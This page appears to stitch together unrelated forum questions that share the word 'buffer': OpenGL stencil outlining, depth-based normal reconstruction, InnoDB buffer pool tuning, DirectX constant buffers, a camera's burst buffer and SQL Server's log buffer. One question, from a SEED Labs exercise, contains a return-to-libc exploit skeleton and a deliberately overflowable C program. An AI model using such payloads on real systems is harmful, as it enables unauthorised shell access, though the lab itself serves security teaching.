opengl – GLSL fragment discard not working with the stencil buffer

I'm trying to create a system I can use to outline sprites, but I can only make it work with a regularly shaped texture. This is what an outlined regular texture looks like:

Working outline

However, here is an irregular texture with the same outline code:

broken outline

I should note that the broken outline does use modified texture coordinates, but this shouldn't matter, because all pixels with alpha = 0 are discarded (the second texture is transparent around the person), which should prevent them from ever reaching the stencil buffer. However, the stencil buffer still counts the discarded pixels as "written". Here are my shaders, which are identical for both textures:

Texture vertex:

#version 330 core
layout (location = 0) in vec3 aPos;
layout (location = 1) in vec2 aTexCoord;

out vec2 TexCoord;

uniform mat4 transform;
uniform mat4 view;
uniform mat4 projection;

void main()
{
    gl_Position = projection * view * transform * vec4(aPos, 1.0);
    TexCoord = aTexCoord;
}

Texture fragment:

#version 330 core
out vec4 FragColor;

in vec2 TexCoord;

uniform sampler2D ourTexture;
uniform vec4 color;

void main()
{
    FragColor = texture(ourTexture, TexCoord) * color;
    if (FragColor.a == 0) discard;
}

Outline fragment (paired with texture vertex):

#version 330 core

out vec4 fragColor;

uniform vec4 color;

void main() {
    fragColor = color;
    if (fragColor.a == 0) discard;
}

Finally, here is the common render code:

void c2m::client::gl::Sprite::render() {
    // Set shader uniforms if the shader is initialized
    if (shader != nullptr) {
        if (outlineWidth > 0) {
            glStencilFunc(GL_ALWAYS, 1, 0xFF);
            glStencilMask(0xFF);
        }

        applyTransforms();
        // Texture vertex and fragment
        shader->useShader();
        shader->setMat4("transform", trans);
        shader->setVec4("color", color.asVec4());
    }

    // Rebind the VAO to be able to modify its VBOs
    glBindVertexArray(vao);

    // Reset vertex data to class array
    glBindBuffer(GL_ARRAY_BUFFER, vbo);
    glBufferSubData(GL_ARRAY_BUFFER, 0, sizeof(vertices), vertices);
    glBindBuffer(GL_ARRAY_BUFFER, 0);

    // Bind texture
    tex->bind();

    // Draw
    glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, ebo);
    glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_INT, 0);

    // If the outline width is 0 return
    if (outlineWidth == 0) {
        return;
    }

    // Draw outline
    if (outlineShader != nullptr) {
        glStencilFunc(GL_NOTEQUAL, 1, 0xFF);
        glStencilMask(0x00);
        glDisable(GL_DEPTH_TEST);
        // Texture vertex and outline fragment
        outlineShader->useShader();

        outlineShader->setVec4("color", outlineRGBA.asVec4());
        // Temporary transform matrix to prevent pollution of user-set transforms
        glm::mat4 tempTransform = trans;
        tempTransform = glm::scale(tempTransform, glm::vec3(outlineWidth + 1, outlineWidth + 1, outlineWidth + 1));
        outlineShader->setMat4("transform", tempTransform);
        glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_INT, 0);

        glStencilMask(0xFF);
        glEnable(GL_DEPTH_TEST);
        glStencilFunc(GL_ALWAYS, 1, 0xFF);
    }
}

Here is my stencil buffer initialization code:

// Stencil
glEnable(GL_STENCIL_TEST);
// Disable stencil writing by default, to be enabled per draw cycle
glStencilFunc(GL_NOTEQUAL, 1, 0xFF);
glStencilOp(GL_KEEP, GL_KEEP, GL_REPLACE);
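
One assumption worth making explicit: the code above relies on the stencil buffer being cleared every frame while the stencil write mask is enabled, since glClear cannot write to the stencil buffer while the mask is 0x00. A minimal sketch of such a clear (my actual clear code is not shown here):

glStencilMask(0xFF);  // the clear respects the stencil write mask
glClearStencil(0);    // value the stencil buffer is cleared to
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT | GL_STENCIL_BUFFER_BIT);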

Am I doing something wrong in my texture fragment shader so that transparent pixels are not properly discarded, have I misconfigured the stencil buffer, or have I missed something somewhere else?

Mathematics – Accurate normal reconstruction from depth buffer

I am trying to reconstruct normals from the depth buffer using this method: https://atyuwen.github.io/posts/normal-reconstruction/

But I think that I am missing something when calculating the derivatives.


This is how I handle the entire reconstruction, following that method.

Any idea what's going wrong?

// This is how position is reconstructed
float3 reconstructPosition(float2 uv, float z, float4x4 InvVP)
{
    float x = uv.x * 2.0f - 1.0f;
    float y = (1.0 - uv.y) * 2.0f - 1.0f;
    float4 position_s = float4(x, y, z, 1.0f);
    float4 position_v = mul(InvVP, position_s);
    return position_v.xyz / position_v.w;
}

// This is how the normal is reconstructed
float2 uv0 = projection.xy / projection.w;
float depth = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv0), _ZBufferParams);

float2 uv1 = uv0 - float2(1.0 / _CameraDepthTexture_TexelSize.z, 0);
float2 uv2 = uv0 + float2(1.0 / _CameraDepthTexture_TexelSize.z, 0);
float2 uv3 = uv0 - float2(2.0 / _CameraDepthTexture_TexelSize.z, 0);
float2 uv4 = uv0 + float2(2.0 / _CameraDepthTexture_TexelSize.z, 0);

float4 H;
H.x = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv1), _ZBufferParams);
H.y = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv2), _ZBufferParams);
H.z = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv3), _ZBufferParams);
H.w = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv4), _ZBufferParams);

float2 he = abs(H.xy * H.zw * rcp(2.0 * H.zw - H.xy) - depth);
float3 hDeriv;
if (he.x > he.y)
{ hDeriv =  reconstructPosition(uv3, H.z, UNITY_MATRIX_I_VP) - reconstructPosition(uv1, H.x, UNITY_MATRIX_I_VP); }
else
{ hDeriv =  reconstructPosition(uv2, H.y, UNITY_MATRIX_I_VP) - reconstructPosition(uv4, H.w, UNITY_MATRIX_I_VP); }

uv1 = uv0 - float2(0, 1.0 / _CameraDepthTexture_TexelSize.w);
uv2 = uv0 + float2(0, 1.0 / _CameraDepthTexture_TexelSize.w);
uv3 = uv0 - float2(0, 2.0 / _CameraDepthTexture_TexelSize.w);
uv4 = uv0 + float2(0, 2.0 / _CameraDepthTexture_TexelSize.w);

float4 V;
V.x = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv1), _ZBufferParams);
V.y = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv2), _ZBufferParams);
V.z = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv3), _ZBufferParams);
V.w = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv4), _ZBufferParams);

float2 ve = abs(V.xy * V.zw * rcp(2.0 * V.zw - V.xy) - depth);
float3 vDeriv;
if (ve.x > ve.y)
{ vDeriv =  reconstructPosition(uv3, V.z, UNITY_MATRIX_I_VP) - reconstructPosition(uv1, V.x, UNITY_MATRIX_I_VP); }
else
{ vDeriv =  reconstructPosition(uv2, V.y, UNITY_MATRIX_I_VP) - reconstructPosition(uv4, V.w, UNITY_MATRIX_I_VP); }

float3 normal = cross(vDeriv, hDeriv);
normal.z = -normal.z;
normal = normalize(normal) * 0.5 + 0.5;
return normal;
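
For reference, my understanding of the he/ve test above is that it extrapolates the two samples on each side to the centre texel, assuming the depth values are linear in 1/z (true for raw device depth; I am not sure it still holds after Linear01Depth). With $z_1$ the sample one texel away and $z_2$ the sample two texels away:

$$\frac{1}{z_0} \approx \frac{2}{z_1} - \frac{1}{z_2} \quad\Longrightarrow\quad z_0 \approx \frac{z_1 z_2}{2\,z_2 - z_1},$$

which is exactly the H.xy * H.zw * rcp(2.0 * H.zw - H.xy) term; the side whose extrapolated depth lands closer to the centre depth is taken to lie on the same surface.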

Partitioning and the InnoDB buffer pool

I am trying to manage a database with a table of 40 billion rows (7.2 terabytes) on a server, using InnoDB as the storage engine on MariaDB (MySQL 5.5).

When my database reaches approximately 2.5 terabytes, I can no longer insert data into the table at the rate required in production. Data in the table is rarely queried after 24 hours. The table has a primary key and a secondary index. After doing some research, it seems important to understand the InnoDB buffer pool if I want to solve this problem. This is obviously too much data to fit in the buffer pool. I have some ideas on how I can improve performance by increasing the likelihood that data from the past 24 hours will be stored in the buffer pool, but it is difficult to test them all with such a large amount of data. How does the InnoDB buffer pool behave in the following situations? Is an idea obviously better? Or are they all bad?

  1. Partition the large table by time so that the data and index of each partition fit into the buffer pool. – https://mariadb.com/kb/en/partition-maintenance/ suggests that this should improve performance, but I've seen conflicting information about how indexing works for partitioned tables. Is it one massive index, or several smaller per-partition indexes that would fit in the buffer pool? If it is one large index, it is hard to see how this would help.
  2. Create two time-partitioned tables: a large table holding the archived partitions, and a table containing only one "active" partition with the data likely to be queried (perhaps a week's worth). When I move on to the next partition in the active table (the next week's data), I swap the previous active partition (the last week's data) into the archive table. – This seems advantageous because the active table is guaranteed to fit in the buffer pool, and queries that might perform a full table scan will not read old data that would evict the active data from the buffer pool, since the old data lives in a different table. However, I assume that when the recently active partition is swapped into the archive table, everything grinds to a halt while the archive table's index is read from disk into the buffer pool and recalculated, and performance will then suffer for a while until the active data is back in RAM.
  3. Create a time-partitioned table with archived data and a small table holding a minimal amount of data (probably 24 hours' worth). Then periodically copy data older than 24 hours from the small table into the partitioned archive table. – I find it hard to see how this could be a good option, since copying data is no faster than moving an entire partition.

Any insight is greatly appreciated!

How to find the buffer offset for Return to Libc Attack

I'm trying to find the buffer offsets to implement my SEED Labs return-to-libc attack.

The lab link is also here: https://seedsecuritylabs.org/Labs_16.04/PDF/Return_to_Libc.pdf

How do I find X, Y and Z in a return-to-libc attack with a buffer size of 150?
This is the exploit code we were given. I have already found the addresses that need to be written into the buffer; I only need X, Y and Z:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {

    char buf[40];
    FILE *badfile;
    badfile = fopen("./badfile", "w");

/* You need to decide the addresses and the values for X, Y, Z. The order of the following three
statements does not imply the order of X, Y, Z. Actually, we intentionally scrambled the order. */

    *(long *) &buf[X] = 0xbffffdd4; // /bin/sh

    *(long *) &buf[Y] = 0xb7e42da0; // system()

    *(long *) &buf[Z] = 0xb7e369d0; // exit()

    fwrite(buf, sizeof(buf), 1, badfile);

    fclose(badfile);

}
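
From what I understand so far, the classic 32-bit cdecl layout would be the following, where ret_off (a name I made up, not from the lab) is the offset of bof()'s saved return address within its buffer, which still has to be measured, e.g. in gdb (break bof, run, then compare (char *)$ebp + 4 against &buffer):

    /* Sketch only; ret_off must be measured for the actual stack layout. */
    *(long *) &buf[ret_off]     = 0xb7e42da0; // system(): bof() returns here
    *(long *) &buf[ret_off + 4] = 0xb7e369d0; // exit(): where system() "returns" to
    *(long *) &buf[ret_off + 8] = 0xbffffdd4; // "/bin/sh": read as system()'s argument

Is that the right way to think about X, Y and Z here?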

This is also the vulnerable program that we were given:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Changing this size will change the layout of the stack.
 * Instructors can change this value each year, so students
 * won't be able to use the solutions from the past.
 * Suggested value: between 0 and 200 (cannot exceed 300, or
 * the program won't have a buffer-overflow problem). */

#ifndef BUF_SIZE
#define BUF_SIZE 150
#endif

int bof(FILE *badfile) {

    char buffer[BUF_SIZE];

    /* The following statement has a buffer overflow problem */
    fread(buffer, sizeof(char), 300, badfile);

    return 1;

}

int main(int argc, char **argv) {

    FILE *badfile;

    /* Change the size of the dummy array to randomize the parameters
       for this lab. The array must be used at least once. */
    char dummy[BUF_SIZE*5];
    memset(dummy, 0, BUF_SIZE*5);

    badfile = fopen("badfile", "r");

    bof(badfile);

    printf("Returned Properlyn");

    fclose(badfile);

    return 1;

}

directx – If I use the vertex shader to perform all transformations on an object, can the constant buffer be empty?

The program cycle is

Update();
UpdatePipeline();

In Update(), the constant buffer of every object gets that object's world matrix copied into the GPU upload heap after the transformations. In UpdatePipeline(), among other things, the bound shaders are invoked. Since we do all matrix transformations on the CPU, the vertex shader only passes the position through, right? If so, is it true that this improves performance?

Now I want to do all the transformations on the GPU instead, i.e. in the vertex shader. Does that mean that in Update() I should just call memcpy() with an empty constant buffer as the source?
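
To make the question concrete, here is a sketch of what I mean (ObjectConstants and mappedHeapPtr are made-up names, not my real code):

#include <cstring>        // memcpy
#include <DirectXMath.h>  // DirectX::XMFLOAT4X4

struct ObjectConstants { DirectX::XMFLOAT4X4 world; };

void Update(ObjectConstants* mappedHeapPtr,     // pointer from ID3D12Resource::Map
            const DirectX::XMFLOAT4X4& world)   // computed on the CPU today
{
    ObjectConstants c;
    c.world = world;
    // CPU-transform path: upload the finished matrix each frame.
    std::memcpy(mappedHeapPtr, &c, sizeof(c));
    // GPU-transform path: the buffer would not become empty; the vertex shader
    // still needs the untransformed matrices as input, so Update() would upload
    // those instead, and only the multiplication moves to the vertex shader.
}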

mysql – How is the InnoDB buffer pool released?

The usual purpose of the InnoDB buffer pool is to keep frequently requested pages quickly accessible. However, I have a huge database (~10 TB) with a 32 GB buffer pool that is used for data analysis: I am constantly writing to the database and running calculations. There are no frequently requested pages other than the indexes.

I have also configured InnoDB with

innodb_change_buffer_max_size=50
innodb_buffer_pool_load_at_startup=OFF
innodb_buffer_pool_dump_at_shutdown=OFF

because I don't need a warm-up: I work with different records in different tables (even different databases), and there is almost no repeated querying within a window in which the buffer pool could keep the relevant pages.

The problem is that the buffer pool quickly fills with pages I don't need: the free buffers drop to ~0 (while the dirty pages also stay near ~0), and the system becomes slow until I reboot to release the buffer pool.

How can I configure InnoDB to use the buffer pool effectively? For example, by evicting old pages that have not been used for a certain time?
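
Concretely, I have been looking at the LRU midpoint settings, which seem to target exactly this scan-pollution pattern (values below are purely illustrative, not tested):

innodb_old_blocks_pct=20
innodb_old_blocks_time=2000

but I don't know whether that is the right lever here.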

Performance – Olympus OM-D E-M1 Mark III: Is there a way to determine the number of exposures remaining in continuous shooting before the buffer fills up?

Many interchangeable lens cameras offer some kind of buffer capacity indicator during recording, which typically shows the approximate number of images that can be stored in the buffer, and therefore how many more images can be captured in continuous mode before the camera slows down:

However, I cannot find a similar function on my Olympus OM-D E-M1 Mark III. Does the camera have such a function, and if so, where can I activate it? I have already reached out to Olympus on Twitter about a buffer-capacity display function.

Denial of service – Difference between integer, buffer, stack, heap and cache overflows, and the nuances of their criticality with regard to the system


backup – What is the transaction log buffer in SQL Server for?

My question is: why do we use the transaction log buffer at all?

As I understand it, SQL Server places log records in the transaction log buffer, and when a checkpoint runs, it flushes the dirty pages (of committed transactions) and the log records to disk (.mdf / .ldf).

So shouldn't there then be no active log left in the actual transaction log file, with all transactions simply waiting for the backup process?

Thank you in advance.